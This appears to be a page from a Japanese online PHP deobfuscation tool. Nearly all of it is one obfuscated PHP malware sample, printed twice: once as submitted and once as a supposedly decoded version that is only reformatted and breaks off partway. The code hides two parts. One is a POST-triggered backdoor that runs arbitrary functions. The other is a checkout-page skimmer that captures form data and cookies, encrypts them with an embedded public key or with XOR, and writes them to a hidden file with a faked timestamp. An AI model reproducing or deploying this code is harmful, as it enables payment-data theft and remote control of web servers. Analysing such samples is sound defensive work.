Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php if(!class_exists('_b484c73e94fd2eb4860a450a5c5e3789')){ class _b484c73e94fd2eb4860a450a5c5e3789{ private static$s; static function g($n,$k){ if(!self::$s): self::i(); endif; $l = strlen($k); $r = base64_decode(self::$s[$n]); for( $i=0, $c=strlen($r); $i!==$c; ++$i): $r[$i]=chr(ord($r[$i])^o...



難読化されたPHPコード

<?php
if(!class_exists('_b484c73e94fd2eb4860a450a5c5e3789')){
  class _b484c73e94fd2eb4860a450a5c5e3789{
    private static$s;
    static function g($n,$k){
      if(!self::$s):
        self::i();
      endif;
      $l = strlen($k);
      $r = base64_decode(self::$s[$n]);
      for( $i=0, $c=strlen($r); $i!==$c; ++$i):
        $r[$i]=chr(ord($r[$i])^ord($k[$i%$l])
      );
    endfor;
    return $r;

  }
  private static function i(){
    self::$s=array(
      '_0'=>'AAE=',
      '_2'=>'aQpoAGpVaQJoAWgBaQJoCg==',
      '_4'=>'AAQ=',
      '_6'=>'aQ5pUmpRaQZoBWgFaQZoDg==',
      '_8'=>'AAs=',
      '_10'=>'aAQHOgdSaQgHOgdT',
      '_12'=>'AAI=',
      '_14'=>'aAEDbgcGaVM=',
      '_16'=>'AAU=',
      '_18'=>'aQcPZgdaaQQMOQcMaAkPZgYKaAUObA==',
      '_20'=>'AAc=',
      '_22'=>'aAIFbgQAaVA=',
      '_24'=>'AAQ=',
      '_26'=>'aQQBZgRUaQcCOQQAaQcAawdRaQEBOQRSaAYBagRSaAYAbA==',
      '_28'=>'AAU=',
      '_30'=>'aAYHOgVSaQoHOgVT',
      '_32'=>'AAs=',
      '_34'=>'aAACawQHaAACawQH',
      '_36'=>'AAo=',
      '_38'=>'aQUOagVcaQAOawUAaVUPOgZfaQYOZwUAaAAOawQK',
      '_40'=>'AAUB',
      '_42'=>'aVAFbQFVaAcEawMBaVcFagJW',
      '_44'=>'AAUE',
      '_46'=>'aAcAawMFaVcBagJS',
      '_48'=>'AAUL',
      '_50'=>'aQMHZgNSaQAEOQMGaQAGawBXaQYHOQNUaAEHagNUaAEGbA==',
      '_52'=>'AAQA',
      '_54'=>'aAUDbgMGaVc=',
      '_56'=>'AAQD',
      '_58'=>'aAUPbgMKaVc=',
      '_60'=>'AAcE',
      '_62'=>'aAYFbgAAaVQ=',
      '_64'=>'AAcD',
      '_66'=>'aQAAagBSaQUAawAOaVABOgNRaQMAZwAOaAUAawEE',
      '_68'=>'AAcO',
      '_70'=>'aQEGagFUaQQGawEIaVEHOgJXaQIGZwEIaAQGawAC',
      '_72'=>'AAYL',
      '_74'=>'aQECagFQaQQCawEMaVEDOgJTaQICZwEMaAQCawAG',
      '_76'=>'AAYO',
      '_78'=>'aQEOagFcaQQOawEAaVEPOgJfaQIOZwEAaAQOawAK',
      '_80'=>'AAoB',
      '_82'=>'aV4Ebw4GaV0EbA8AaVsGOQ8BaQkFOg4HaV4FOw1VaAgEbA4GaA0Faw5Val4FbQ8KaAwFag8A',
      '_84'=>'AAoE',
      '_86'=>'aV4Abw4CaV0AbA8EaVsCOQ8FaQkBOg4DaV4BOw1RaAgAbA4CaA0Baw5Ral4BbQ8OaAwBag8E',
      '_88'=>'AAoL',
      '_90'=>'aV8Gbw8EaVwGbA4CaVoEOQ8GaQwGawxXaAkGag8DaVoHZg8CaVsHag4I',
      '_92'=>'AAsA',
      '_94'=>'aV8Cbw8AaVwCbA4GaVoAOQ4FaAwDbQ9WaQADbAxTaQwDOg8GaAsCZg4FaA0=',
      '_96'=>'AAsD',
      '_98'=>'aV8Obw8MaVwObA4KaVoMOQ8PaAsPag8Mal8PPQ8MaAA=',
      '_100'=>'AAMF',
      '_102'=>'aVcHA2kEBlZoAgcAaVIFVWkEBlZpAgcBaAgHA2gF',
      '_104'=>'AAMG',
      '_106'=>'aAEGBmkCBlU=',
      '_108'=>'AAMH',
      '_110'=>'aAEHAGkCB1M=',
      '_112'=>'AAMJ',
      '_114'=>'aAEHBGkCB1c=',
      '_116'=>'AAMI',
      '_118'=>'aAMHCGlUBw0=',
      '_120'=>'AAIC',
      '_122'=>'aAEEAmkCBFE=',
      '_124'=>'AAID',
      '_126'=>'aAEEBmkCBFU=',
      '_128'=>'AAIA',
      '_130'=>'aAEFAGkCBVM=',
      '_132'=>'AAIA',
      '_134'=>'aQcFDGlSBQBqVwQFaAQEAWpXBQZpVwVQaAUFAGlUBAFoAg==',
      '_136'=>'AAIH',
      '_138'=>'aQcFAGlSBQxpVQQNaQgFXWkE',
      '_140'=>'AAIB',
      '_142'=>'aAUCVWgEAgBpCQ==',
      '_144'=>'DXRlYBpiYGoSdGB9EHU=',
      '_146'=>'DXRlYhpiYGgSdGB/EHU=',
      '_148'=>'D35nbQ==',
      '_150'=>'LGBNBxdBB34GW3to',
      '_152'=>'PF5bVTZDWA==',
      '_154'=>'PF1QVC0=',
      '_156'=>'LURb',
      '_158'=>'cEVYSXAfVlg8WVAUKl9cQQ==',
      '_160'=>'D3lmYhpiZXgb',
      '_162'=>'AAE=',
      '_164'=>'D1AAZWt6XUEnZ3sDOX10',
      '_166'=>'AAA=',
      '_168'=>'AAM=',
      '_170'=>'AAI=',
      '_172'=>'PFI=',
      '_174'=>'AAU=',
      '_176'=>'AAQ=',
      '_178'=>'PFI=',
      '_180'=>'AAc=',
      '_182'=>'AAY=',
      '_184'=>'DXRpYBpibGoKY3E=',
      '_186'=>'cEFZTjJUVkNyWFZRMENVVitYV1k=',
      '_188'=>'AAk=',
      '_190'=>'AAg=',
      '_192'=>'MlNmQCtDVVYx',
      '_194'=>'AAAJ',
      '_196'=>'Z1NQQw==',
      '_198'=>'AAAI',
      '_200'=>'AAMC',
      '_202'=>'L1pACXAdWV0vR0Q=',
      '_204'=>'AAMD',
      '_206'=>'Ng==',
      '_208'=>'AAME',
      '_210'=>'Ng==',
      '_212'=>'Yg==',
      '_214'=>'AAME',
      '_216'=>'Ng==',
      '_218'=>'AAMH',
      '_220'=>'MEJXXyxBXm44V0ZuL0dQXTZRWVQm',
      '_222'=>'AAMF',
      '_224'=>'MEJXWyxBXmovR1BZNlFtUDFRQEwvRg==',
      '_226'=>'AAMK',
      '_228'=>'MEJXVyxBXmY6XFFLJkJG',
      '_230'=>'AAMK',
      '_232'=>'MEJWXSxBX2wtU11XMF9sQyxXRlcwbVFKK1dA',
      '_234'=>'AAAD',
      '_236'=>'AAAC',
      '_238'=>'AAAB',
      '_240'=>'ch8ZHHJwcXYWfBRhCnB4eBwSf3QGHxkcch8+fBZ1UnweAnNyDENzYhZQB3UOd3ZwDmd1cGt1enAbcXZYDnl2Vg52d0ccam1DOnhkXXRqWX0JXVF5L2sBdw4LHztpQkFWNAcCAGh6eGcxAH54MEMMcjABe11sWQ16K39wUisDdgMMUFZpZlZ2ZRcBTl0OR2BhGF91WmYLe2sKRWd3VQdGcxBjUUAxAHdjbFNnAitqXUE4XwBIKHdkCRUEAUM0fHFUawBOdgcBfGUXf1IHHWFRfGZYRHQuQl8DC1lhRRs4d1dmdmNbJXpcewdze0FmZ2ZGFnZ1YB5wPhxyHxkcGnxwEQ9ndn0WcRR6GmsZHHIfGTs=',
      '_242'=>'AAAH',
      '_244'=>'AAAA',
      '_246'=>'AAAB',
      '_248'=>'HndnFG4ADBQccHc=',
      '_250'=>'AAAD',
      '_252'=>'PFs=',
      '_254'=>'AAAC',
      '_256'=>'Ng==',
      '_258'=>'AAAN',
      '_260'=>'PA==',
      '_262'=>'AAEG',
      '_264'=>'PA==',
      '_266'=>'AAAP',
      '_268'=>'AAEH',
      '_270'=>'PFFe',
      '_272'=>'AAEF',
      '_274'=>'PA==',
      '_276'=>'AAEE',
      '_278'=>'AAED',
      '_280'=>'AAEN',
    );
  }}
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_0','_1')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_2','_3'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_4','_5')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_6','_7'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_8','_9')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_10','_11'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_12','_13')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_14','_15'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_16','_17')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_18','_19'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_20','_21')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_22','_23'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_24','_25')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_26','_27'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_28','_29')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_30','_31'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_32','_33')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_34','_35'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_36','_37')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_38','_39'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_40','_41')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_42','_43'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_44','_45')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_46','_47'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_48','_49')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_50','_51'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_52','_53')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_54','_55'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_56','_57')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_58','_59'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_60','_61')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_62','_63'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_64','_65')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_66','_67'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_68','_69')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_70','_71'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_72','_73')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_74','_75'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_76','_77')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_78','_79'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_80','_81')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_82','_83'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_84','_85')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_86','_87'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_88','_89')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_90','_91'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_92','_93')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_94','_95'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_96','_97')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_98','_99'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_100','_101')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_102','_103'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_104','_105')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_106','_107'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_108','_109')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_110','_111'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_112','_113')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_114','_115'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_116','_117')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_118','_119'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_120','_121')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_122','_123'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_124','_125')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_126','_127'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_128','_129')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_130','_131'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_132','_133')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_134','_135'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_136','_137')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_138','_139'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_140','_141')]=hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_142','_143'));
  if(isset($_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_144','_145')])&&($_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_146','_147')]==_b484c73e94fd2eb4860a450a5c5e3789::g('_148','_149'))):
    $control=array(_b484c73e94fd2eb4860a450a5c5e3789::g('_150','_151'),_b484c73e94fd2eb4860a450a5c5e3789::g('_152','_153'),_b484c73e94fd2eb4860a450a5c5e3789::g('_154','_155'),_b484c73e94fd2eb4860a450a5c5e3789::g('_156','_157'));
    $filename=_b484c73e94fd2eb4860a450a5c5e3789::g('_158','_159');
    $cookie=_b484c73e94fd2eb4860a450a5c5e3789::g('_160','_161');
    if($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_162','_163')]($_POST)&&isset($_POST[$control[0]])&&$_POST[$control[0]]==_b484c73e94fd2eb4860a450a5c5e3789::g('_164','_165')):
      if(isset($_POST[$control[3]])):
        foreach($_POST as$func=>$arg):
          if(!$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_166','_167')]($func,$control)):
            die($func($arg));
          endif;
        endforeach;
      endif;
      if(isset($_POST[$control[2]])):
        @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_168','_169')]($filename);
        die($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_170','_171')](_b484c73e94fd2eb4860a450a5c5e3789::g('_172','_173'),0xC1,0xEA));
      endif;
      if(!$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_174','_175')]($filename)):
        die($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_176','_177')](_b484c73e94fd2eb4860a450a5c5e3789::g('_178','_179'),0xFA,0xCE));
      endif;
      $content=@$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_180','_181')]($filename);
      if(isset($_POST[$control[1]])):
        @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_182','_183')]($filename);
      endif;
      die($content);
    endif;
    $addr=$_SERVER[_b484c73e94fd2eb4860a450a5c5e3789::g('_184','_185')];
    $is_checkout_page=false;
    foreach(array(_b484c73e94fd2eb4860a450a5c5e3789::g('_186','_187')) as$page):
      if($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_188','_189')]($addr,$page)):
        $is_checkout_page=true;
        break;
      endif;
    endforeach;
    if($is_checkout_page):
      $mbstr=function($string){
        return$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_190','_191')](_b484c73e94fd2eb4860a450a5c5e3789::g('_192','_193')) ? $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_194','_195')]($string,_b484c73e94fd2eb4860a450a5c5e3789::g('_196','_197')) : $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_198','_199')]($string);
      };
      $content=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_200','_201')](_b484c73e94fd2eb4860a450a5c5e3789::g('_202','_203'));
      $content=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_204','_205')](_b484c73e94fd2eb4860a450a5c5e3789::g('_206','_207'),$mbstr($addr)).$addr.$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_208','_209')](_b484c73e94fd2eb4860a450a5c5e3789::g('_210','_211'),$mbstr($content)).$content;
      if(isset($_COOKIE[$cookie])):
        $c_val=$cookie._b484c73e94fd2eb4860a450a5c5e3789::g('_212','_213').$_COOKIE[$cookie];
        $content.=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_214','_215')](_b484c73e94fd2eb4860a450a5c5e3789::g('_216','_217'),$mbstr($c_val)).$c_val;
      endif;
      if($GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_218','_219')](_b484c73e94fd2eb4860a450a5c5e3789::g('_220','_221'))&&$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_222','_223')](_b484c73e94fd2eb4860a450a5c5e3789::g('_224','_225'))&&$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_226','_227')](_b484c73e94fd2eb4860a450a5c5e3789::g('_228','_229'))&&$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_230','_231')](_b484c73e94fd2eb4860a450a5c5e3789::g('_232','_233'))): 
        $enc_key=null;
        $aes_key=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_234','_235')](16);
        $iv=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_236','_237')](16);
        $pub_key=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_238','_239')](_b484c73e94fd2eb4860a450a5c5e3789::g('_240','_241'));
        $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_242','_243')]($aes_key,$enc_key,$pub_key);
        $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_244','_245')]($pub_key);
        $is_open_ssl=true;
      endif;
      if($is_open_ssl):
        $content=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_246','_247')]($content,_b484c73e94fd2eb4860a450a5c5e3789::g('_248','_249'),$aes_key,OPENSSL_RAW_DATA,$iv);
        $log_entry=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_250','_251')](_b484c73e94fd2eb4860a450a5c5e3789::g('_252','_253'),0x01,$mbstr($enc_key)).$enc_key.$iv.$GLOBALS
        [_b484c73e94fd2eb4860a450a5c5e3789::g('_254','_255')](_b484c73e94fd2eb4860a450a5c5e3789::g('_256','_257'),$mbstr($content)).$content.$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_258','_259')](_b484c73e94fd2eb4860a450a5c5e3789::g('_260','_261'),0x00);
      else:
        $xor_byte=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_262','_263')](_b484c73e94fd2eb4860a450a5c5e3789::g('_264','_265'),$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_266','_267')]());
        $content_length=$mbstr($content);
        for( $i=0; $i<$content_length; $i++):
          $content[$i]=($content[$i]^$xor_byte);
        endfor;
        $log_entry=$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_268','_269')](_b484c73e94fd2eb4860a450a5c5e3789::g('_270','_271'),0x00,$xor_byte,$content_length).$content.$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_272','_273')](_b484c73e94fd2eb4860a450a5c5e3789::g('_274','_275'),0x00);
      endif;
      @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_276','_277')]($filename,$log_entry,FILE_APPEND|LOCK_EX);
      $time=@$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_278','_279')](__FILE__);
      @$GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_280','_281')]($filename,$time,$time);
    endif;
  endif;
}

デコード(難読化解除)されたコード

<?php

if (!class_exists('_b484c73e94fd2eb4860a450a5c5e3789')) {
  class _b484c73e94fd2eb4860a450a5c5e3789
  {
    private static $s;
    static function g($n, $k)
    {
      if (!self::$s) {
        self::i();
      }
      $l = strlen($k);
      $r = base64_decode(self::$s[$n]);
      for ($i = 0, $c = strlen($r); $i !== $c; ++$i) {
        $r[$i] = chr(ord($r[$i]) ^ ord($k[$i % $l]));
      }
      return $r;
    }
    private static function i()
    {
      self::$s = array('_0' => 'AAE=', '_2' => 'aQpoAGpVaQJoAWgBaQJoCg==', '_4' => 'AAQ=', '_6' => 'aQ5pUmpRaQZoBWgFaQZoDg==', '_8' => 'AAs=', '_10' => 'aAQHOgdSaQgHOgdT', '_12' => 'AAI=', '_14' => 'aAEDbgcGaVM=', '_16' => 'AAU=', '_18' => 'aQcPZgdaaQQMOQcMaAkPZgYKaAUObA==', '_20' => 'AAc=', '_22' => 'aAIFbgQAaVA=', '_24' => 'AAQ=', '_26' => 'aQQBZgRUaQcCOQQAaQcAawdRaQEBOQRSaAYBagRSaAYAbA==', '_28' => 'AAU=', '_30' => 'aAYHOgVSaQoHOgVT', '_32' => 'AAs=', '_34' => 'aAACawQHaAACawQH', '_36' => 'AAo=', '_38' => 'aQUOagVcaQAOawUAaVUPOgZfaQYOZwUAaAAOawQK', '_40' => 'AAUB', '_42' => 'aVAFbQFVaAcEawMBaVcFagJW', '_44' => 'AAUE', '_46' => 'aAcAawMFaVcBagJS', '_48' => 'AAUL', '_50' => 'aQMHZgNSaQAEOQMGaQAGawBXaQYHOQNUaAEHagNUaAEGbA==', '_52' => 'AAQA', '_54' => 'aAUDbgMGaVc=', '_56' => 'AAQD', '_58' => 'aAUPbgMKaVc=', '_60' => 'AAcE', '_62' => 'aAYFbgAAaVQ=', '_64' => 'AAcD', '_66' => 'aQAAagBSaQUAawAOaVABOgNRaQMAZwAOaAUAawEE', '_68' => 'AAcO', '_70' => 'aQEGagFUaQQGawEIaVEHOgJXaQIGZwEIaAQGawAC', '_72' => 'AAYL', '_74' => 'aQECagFQaQQCawEMaVEDOgJTaQICZwEMaAQCawAG', '_76' => 'AAYO', '_78' => 'aQEOagFcaQQOawEAaVEPOgJfaQIOZwEAaAQOawAK', '_80' => 'AAoB', '_82' => 'aV4Ebw4GaV0EbA8AaVsGOQ8BaQkFOg4HaV4FOw1VaAgEbA4GaA0Faw5Val4FbQ8KaAwFag8A', '_84' => 'AAoE', '_86' => 'aV4Abw4CaV0AbA8EaVsCOQ8FaQkBOg4DaV4BOw1RaAgAbA4CaA0Baw5Ral4BbQ8OaAwBag8E', '_88' => 'AAoL', '_90' => 'aV8Gbw8EaVwGbA4CaVoEOQ8GaQwGawxXaAkGag8DaVoHZg8CaVsHag4I', '_92' => 'AAsA', '_94' => 'aV8Cbw8AaVwCbA4GaVoAOQ4FaAwDbQ9WaQADbAxTaQwDOg8GaAsCZg4FaA0=', '_96' => 'AAsD', '_98' => 'aV8Obw8MaVwObA4KaVoMOQ8PaAsPag8Mal8PPQ8MaAA=', '_100' => 'AAMF', '_102' => 'aVcHA2kEBlZoAgcAaVIFVWkEBlZpAgcBaAgHA2gF', '_104' => 'AAMG', '_106' => 'aAEGBmkCBlU=', '_108' => 'AAMH', '_110' => 'aAEHAGkCB1M=', '_112' => 'AAMJ', '_114' => 'aAEHBGkCB1c=', '_116' => 'AAMI', '_118' => 'aAMHCGlUBw0=', '_120' => 'AAIC', '_122' => 'aAEEAmkCBFE=', '_124' => 'AAID', '_126' => 'aAEEBmkCBFU=', '_128' => 'AAIA', '_130' => 'aAEFAGkCBVM=', '_132' => 'AAIA', '_134' => 'aQcFDGlSBQBqVwQFaAQEAWpXBQZpVwVQaAUFAGlUBAFoAg==', '_136' => 'AAIH', '_138' => 'aQcFAGlSBQxpVQQNaQgFXWkE', '_140' => 'AAIB', '_142' => 'aAUCVWgEAgBpCQ==', '_144' => 'DXRlYBpiYGoSdGB9EHU=', '_146' => 'DXRlYhpiYGgSdGB/EHU=', '_148' => 'D35nbQ==', '_150' => 'LGBNBxdBB34GW3to', '_152' => 'PF5bVTZDWA==', '_154' => 'PF1QVC0=', '_156' => 'LURb', '_158' => 'cEVYSXAfVlg8WVAUKl9cQQ==', '_160' => 'D3lmYhpiZXgb', '_162' => 'AAE=', '_164' => 'D1AAZWt6XUEnZ3sDOX10', '_166' => 'AAA=', '_168' => 'AAM=', '_170' => 'AAI=', '_172' => 'PFI=', '_174' => 'AAU=', '_176' => 'AAQ=', '_178' => 'PFI=', '_180' => 'AAc=', '_182' => 'AAY=', '_184' => 'DXRpYBpibGoKY3E=', '_186' => 'cEFZTjJUVkNyWFZRMENVVitYV1k=', '_188' => 'AAk=', '_190' => 'AAg=', '_192' => 'MlNmQCtDVVYx', '_194' => 'AAAJ', '_196' => 'Z1NQQw==', '_198' => 'AAAI', '_200' => 'AAMC', '_202' => 'L1pACXAdWV0vR0Q=', '_204' => 'AAMD', '_206' => 'Ng==', '_208' => 'AAME', '_210' => 'Ng==', '_212' => 'Yg==', '_214' => 'AAME', '_216' => 'Ng==', '_218' => 'AAMH', '_220' => 'MEJXXyxBXm44V0ZuL0dQXTZRWVQm', '_222' => 'AAMF', '_224' => 'MEJXWyxBXmovR1BZNlFtUDFRQEwvRg==', '_226' => 'AAMK', '_228' => 'MEJXVyxBXmY6XFFLJkJG', '_230' => 'AAMK', '_232' => 'MEJWXSxBX2wtU11XMF9sQyxXRlcwbVFKK1dA', '_234' => 'AAAD', '_236' => 'AAAC', '_238' => 'AAAB', '_240' => 'ch8ZHHJwcXYWfBRhCnB4eBwSf3QGHxkcch8+fBZ1UnweAnNyDENzYhZQB3UOd3ZwDmd1cGt1enAbcXZYDnl2Vg52d0ccam1DOnhkXXRqWX0JXVF5L2sBdw4LHztpQkFWNAcCAGh6eGcxAH54MEMMcjABe11sWQ16K39wUisDdgMMUFZpZlZ2ZRcBTl0OR2BhGF91WmYLe2sKRWd3VQdGcxBjUUAxAHdjbFNnAitqXUE4XwBIKHdkCRUEAUM0fHFUawBOdgcBfGUXf1IHHWFRfGZYRHQuQl8DC1lhRRs4d1dmdmNbJXpcewdze0FmZ2ZGFnZ1YB5wPhxyHxkcGnxwEQ9ndn0WcRR6GmsZHHIfGTs=', '_242' => 'AAAH', '_244' => 'AAAA', '_246' => 'AAAB', '_248' => 'HndnFG4ADBQccHc=', '_250' => 'AAAD', '_252' => 'PFs=', '_254' => 'AAAC', '_256' => 'Ng==', '_258' => 'AAAN', '_260' => 'PA==', '_262' => 'AAEG', '_264' => 'PA==', '_266' => 'AAAP', '_268' => 'AAEH', '_270' => 'PFFe', '_272' => 'AAEF', '_274' => 'PA==', '_276' => 'AAEE', '_278' => 'AAED', '_280' => 'AAEN');
    }
  }
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_0', '_1')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_2', '_3'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_4', '_5')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_6', '_7'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_8', '_9')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_10', '_11'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_12', '_13')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_14', '_15'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_16', '_17')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_18', '_19'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_20', '_21')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_22', '_23'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_24', '_25')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_26', '_27'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_28', '_29')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_30', '_31'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_32', '_33')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_34', '_35'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_36', '_37')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_38', '_39'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_40', '_41')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_42', '_43'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_44', '_45')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_46', '_47'));
  $GLOBALS[_b484c73e94fd2eb4860a450a5c5e3789::g('_48', '_49')] = hex2bin(_b484c73e94fd2eb4860a450a5c5e3789::g('_50', '_51'));
